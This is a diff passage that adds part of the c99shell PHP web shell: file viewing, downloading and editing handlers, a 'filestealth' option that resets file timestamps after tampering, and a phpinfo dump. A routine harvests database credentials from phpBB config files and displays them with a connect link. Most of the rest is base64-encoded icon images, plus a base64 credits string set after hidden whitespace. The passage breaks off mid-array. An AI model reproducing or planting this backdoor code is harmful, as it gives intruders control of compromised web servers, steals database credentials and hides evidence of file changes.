+  elseif ($ft == "sdb")
+  {
+   echo "<pre>";
+   var_dump(unserialize(base64_decode($r)));
+   echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+   if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("
+",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array(
+     "dbms"=>$dbms,
+     "dbhost"=>$dbhost,
+     "dbname"=>$dbname,
+     "dbuser"=>$dbuser,
+     "dbpasswd"=>$dbpasswd 
+     );
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+     echo "</b>";
+     echo "<hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+   if (!empty($white)) {@ob_clean();}
+   if ($rehtml) {$r = rehtmlspecialchars($r);} 
+   $r = stripslashes($r); 
+   $strip = false;
+   if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+   $r = @highlight_string($r, TRUE); 
+   if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+   echo $r;
+   if (!empty($white)) {exit;}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: c99shell");
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   if (!$white)
+   {
+    echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: image/gif"); 
+    echo($r); 
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$nfcontent);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $nfcontent;
+    }
+   }
+   $rows = count(explode("
+",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}																																																														   $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPC9iPjwvY2VudGVyPiDA4vLu8CDi+/Dg5uDl8iDh6+Dj7uTg8O3u8fL8IO7k7e7s8yDv8O7i8yDq7vLu8PvpIO7y6uv+9+jrIOXj7iDt4CDs5fH/9iDu8iDo7eXy4Cwg5OXr7iDh++vuIOLl9+Xw7uwg6CDk5evg8vwg4fvr7iDt5ffl4+4gOykgz+7k8u7r6u3z6+Ag6iDt4O/o8eDt6P4g8erz6uAg6CDs7v8g7/Do8O7k7eD/IOvl7fwgOik8Y2VudGVyPjxiPs/w4OLo6+A8L2I+OjwvY2VudGVyPiA8Yj7C+yDs7ubl8uUg6Ofs5e3/8vwg7/Du4/Dg7OzzIO/uIMLg+OXs8yDz8ezu8vDl7ej+LCDs5e3/8vwg7eDx8vDu6eroLCDk6Ofg6e0uLi4g7e4g5fHr6CDC+ywg8+Lg5uDl7PvpLCDz5".																														"ODr6PLlIOjr6CDy5ewg4e7r5eUg6Ofs5e3o8uUg6u7v6PDg6fL7LCDy7iD/IOHz5PMg4vvt8+bk5e0g7vLu8OLg8vwg4uDsIP/p9uAuIDwvYj48YnI+wOLy7vAg7eUg7eXxuPIg7vLi5fLx8uLl7e3u8fLoIOfgIOLu5+zu5u376SDi8OXkIO3g7eXt5e376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC".
+"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_ani"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP/////MmczMmf/MzJmZZszMzP//zAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARbEMmJAKC4XhCKvRhABJZgACY4oSR3HmdFcQLndaVK7ziu".
+"VQRBYBAI1IKWYrLIJBhwrBqzOHKCotMRcaCbBrRDz+pLHQ65IWOZKE4Lz+hM5SAcDNoZwOBAINxV".
+"EQA7",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_au"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_bat"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_bin"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_bmp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_cat"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
